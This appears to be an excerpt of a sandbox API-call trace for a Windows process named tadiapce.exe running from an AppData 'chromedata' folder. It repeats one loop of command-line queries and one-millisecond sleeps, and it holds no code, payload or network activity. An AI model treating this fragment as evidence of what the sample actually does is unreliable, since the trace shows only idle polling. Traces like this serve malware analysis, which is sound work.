	[0091.775] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2264c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.775] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.775] Sleep (dwMilliseconds=0x1) 
	[0091.791] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226550*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.791] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.791] Sleep (dwMilliseconds=0x1) 
	[0091.807] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2265e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.807] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.807] Sleep (dwMilliseconds=0x1) 
	[0091.822] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226670*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.822] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.822] Sleep (dwMilliseconds=0x1) 
	[0091.838] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226700*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.839] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.839] Sleep (dwMilliseconds=0x1) 
	[0091.853] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226790*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.853] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.853] Sleep (dwMilliseconds=0x1) 
	[0091.869] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226820*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.869] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.869] Sleep (dwMilliseconds=0x1) 
	[0091.885] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2268b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.885] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.885] Sleep (dwMilliseconds=0x1) 
	[0091.900] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226940*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.900] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.900] Sleep (dwMilliseconds=0x1) 
	[0091.916] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2269d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.916] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.916] Sleep (dwMilliseconds=0x1) 
	[0091.932] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226a60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.932] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.932] Sleep (dwMilliseconds=0x1) 
	[0091.947] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226af0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.947] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.947] Sleep (dwMilliseconds=0x1) 
	[0091.964] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226b80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.964] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.964] Sleep (dwMilliseconds=0x1) 
	[0091.978] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226c10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.978] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.978] Sleep (dwMilliseconds=0x1) 
	[0091.994] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226ca0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.994] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.994] Sleep (dwMilliseconds=0x1) 
	[0092.010] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.010] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.010] Sleep (dwMilliseconds=0x1) 
	[0092.027] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.027] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.027] Sleep (dwMilliseconds=0x1) 
	[0092.041] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.041] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.041] Sleep (dwMilliseconds=0x1) 
	[0092.057] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226ee0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.057] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.057] Sleep (dwMilliseconds=0x1) 
	[0092.072] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226f70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.072] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.072] Sleep (dwMilliseconds=0x1) 
	[0092.087] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227000*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.087] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.087] Sleep (dwMilliseconds=0x1) 
	[0092.103] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227090*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.103] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.103] Sleep (dwMilliseconds=0x1) 
	[0092.119] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227120*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.119] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.119] Sleep (dwMilliseconds=0x1) 
	[0092.134] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2271b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.134] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.134] Sleep (dwMilliseconds=0x1) 
	[0092.152] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227240*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.152] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.152] Sleep (dwMilliseconds=0x1) 
	[0092.167] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2272d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.167] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.167] Sleep (dwMilliseconds=0x1) 
	[0092.181] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227360*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.181] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.181] Sleep (dwMilliseconds=0x1) 
	[0092.197] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2273f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.197] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.197] Sleep (dwMilliseconds=0x1) 
	[0092.212] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227480*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.212] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.212] Sleep (dwMilliseconds=0x1) 
	[0092.228] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227510*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.228] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.228] Sleep (dwMilliseconds=0x1) 
	[0092.243] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2275a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.244] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.244] Sleep (dwMilliseconds=0x1) 
	[0092.259] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227630*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.259] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.259] Sleep (dwMilliseconds=0x1) 
	[0092.275] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2276c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.275] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.275] Sleep (dwMilliseconds=0x1) 
	[0092.290] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227750*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.290] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.290] Sleep (dwMilliseconds=0x1) 
	[0092.306] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2277e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.306] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.306] Sleep (dwMilliseconds=0x1) 
	[0092.321] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227870*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.321] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.321] Sleep (dwMilliseconds=0x1) 
	[0092.337] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227900*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.337] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.337] Sleep (dwMilliseconds=0x1) 
	[0092.353] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227990*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.353] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.353] Sleep (dwMilliseconds=0x1) 
	[0092.368] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227a20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.368] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.368] Sleep (dwMilliseconds=0x1) 
	[0092.384] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227ab0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.384] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.384] Sleep (dwMilliseconds=0x1) 
	[0092.399] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227b40*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.399] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.400] Sleep (dwMilliseconds=0x1) 
	[0092.415] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227bd0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.415] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.415] Sleep (dwMilliseconds=0x1) 
	[0092.431] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227c60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.431] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.431] Sleep (dwMilliseconds=0x1) 
	[0092.446] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227cf0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.446] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.446] Sleep (dwMilliseconds=0x1) 
	[0092.462] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227d80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.462] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.462] Sleep (dwMilliseconds=0x1) 
	[0092.478] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227e10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.478] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.478] Sleep (dwMilliseconds=0x1) 
	[0092.493] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227ea0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.493] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.493] Sleep (dwMilliseconds=0x1) 
	[0092.509] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227f30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.509] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.509] Sleep (dwMilliseconds=0x1) 
	[0092.524] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x227fc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.524] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.524] Sleep (dwMilliseconds=0x1) 
	[0092.540] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228050*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.540] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.540] Sleep (dwMilliseconds=0x1) 
	[0092.557] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2280e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.557] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.557] Sleep (dwMilliseconds=0x1) 
	[0092.579] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228170*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.579] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.579] Sleep (dwMilliseconds=0x1) 
	[0092.587] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228200*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.587] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.587] Sleep (dwMilliseconds=0x1) 
	[0092.603] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228290*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.603] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.603] Sleep (dwMilliseconds=0x1) 
	[0092.618] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2283a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.618] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.618] Sleep (dwMilliseconds=0x1) 
	[0092.633] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228430*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.633] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.633] Sleep (dwMilliseconds=0x1) 
	[0092.649] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2284c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.649] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.649] Sleep (dwMilliseconds=0x1) 
	[0092.665] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x228550*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0092.665] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0092.665] Sleep (dwMilliseconds=0x1) 
	[0092.680] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2285e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
